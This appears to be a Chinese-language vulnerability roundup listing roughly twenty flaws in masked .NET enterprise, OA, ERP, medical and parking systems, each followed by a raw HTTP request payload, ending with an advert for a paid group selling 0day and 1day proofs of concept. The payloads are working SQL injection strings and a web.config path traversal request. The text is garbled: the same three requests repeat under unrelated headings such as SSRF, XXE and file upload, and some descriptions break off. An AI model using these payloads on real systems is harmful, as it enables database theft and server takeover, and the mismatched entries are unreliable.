GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
2

某企业管理系统文件读取漏洞

20.1 漏洞概述

**系统接口 /Utility/GetCss**

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
3

某智能停车系统SQL注入漏洞

19.1 漏洞概述

**系统接口 /KT_Admin/CarCard/DoubtCarNo***.as** 存在SQL注入漏洞。

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
4

某EIS平台SQL注入漏洞-2

18.1 漏洞概述

**EIS系统接口 /frm/frm_form_***.aspx存在SQL注入漏洞。

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
5

某EIS平台SQL注入漏洞

17.1 漏洞概述

**EIS系统接口 /third/DingTalk/Demo/Show**.aspx 存在SQL注入漏洞。

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
6

某达OA系统任意用户登录

16.1 漏洞概述

**达OA系统接口 /Lk6SyncService/DirectToOthers/GetSSO***.asmx 存在任意用户登录漏洞。

16.2 漏洞详情

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
7

某达OA系统SQL注入漏洞

15.1 漏洞概述

**达OA系统接口 /Webservice/IM/Config/Config***.asmx 存在SQL注入漏洞。

15.2 漏洞详情

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
8

某达学分系统SQL注入漏洞

14.1 漏洞概述

***计算机系统开发有限公司，成立于1996年，是一家以从事软件和信息技术服务业为主的企业。学分系统某接口存在SQL注入漏洞，未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。

14.2 漏洞详情

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
9

某云智慧系统SQL注入漏洞

13.1 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
0

某通系统SSRF漏洞

12.1 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
1

某达OA系统XXE漏洞

11.1 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
2

某智ERP系统文件读取漏洞

10.1 漏洞概述

**ERP是一款旨在通过信息化手段帮助企业优化业务流程，提升管理效率，增强综合竞争力。适用于各类企业，包括大型企业、中小型企业以及集团化企业。根据企业规模和业务需求，汇智ERP提供了不同的版本，以满足企业的个性化需求。

10.2 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
3

某和OA系统SQL注入漏洞

9.1 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
4

某慧综合管理系统SQL注入漏洞

8.1 漏洞概述

由于***综合管理信息系统 Login***.aspx没有对外部输入的SQL语句进行严格的校验和过滤，直接带入数据库执行，导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

8.2 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
5

某邦项目管理系统上传漏洞

7.1 漏洞概述

某项目管理系统/***/***In.aspx存在任意文件上传漏洞，导致获取服务器权限，造成系统严重危害。

7.2 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
6

某问物业系统文件读取漏洞

6.1 漏洞概述

物业ERP系统/***DownLoad.aspx和**DownLoad.aspx接口处存在任意文件读取漏洞，未经身份验证的攻击者可以利用

6.2 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
7

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
8

某文工程系统SQL注入漏洞

5.1 漏洞概述

**工程管理系统 ***Business***.as**接口处存在SQL注入漏洞。未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。

5.2 漏洞详情

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
9

某讯一卡通系统SQL注入漏洞

4.1 漏洞概述

**一卡通管理系统get_kq_tj_**存在SQL注入漏洞，未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。

4.2 漏洞详情

GET /api/Down***/File?File**=/../web.config&Title= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0

某脉医疗系统文件下载漏洞

3.1 漏洞概述

**医疗管理系统DownLoad**存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

3.2 漏洞详情

GET /api/Down***/File?File**=/../web.config&Title= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
1

某蓝企业系统文件读取漏洞

**企业管理系统是一款为企业提供全面管理解决方案的软件系统，它能够帮助企业实现精细化管理，提高效率，降低成本。系统集成了多种管理功能，包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等，旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导，结合企业实际业务流程，通过信息化手段提升企业管理水平。

2.1 漏洞概述

**企业管理系统 ***TxtLog和 ***File接口接口处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

2.2 漏洞详情

GET /api/Down***/File?File**=/../web.config&Title= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
2

GET /api/Down***/File?File**=/../web.config&Title= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
3

某享人力管理系统任意文件读取漏洞

*****软件专注研发和推广人力资源信息化产品，帮助企业构建统一的人力资源数智化平台，快速提高企业人才管理能力，提升人力资源管理效率，帮助员工快速成长，协助企业实现智慧决策。

1.1 漏洞概述

该人力系统DownLoad**** 接口处存在任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，造成信息泄露，导致系统处于极不安全的状态。

1.2 漏洞详情

GET /api/Down***/File?File**=/../web.config&Title= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
4

漏洞详情已经打包在星球，感兴趣的朋友可以加入自取。更多的.NET漏洞情报，请加入星球后获取，星球持续更新最新的 .NET 应用漏洞POC，并在每年HW期间提供一手漏洞情报。这些POC/EXP涵盖了一些0day和1day漏洞，确保您始终掌握最前沿的安全信息和防护措施。

二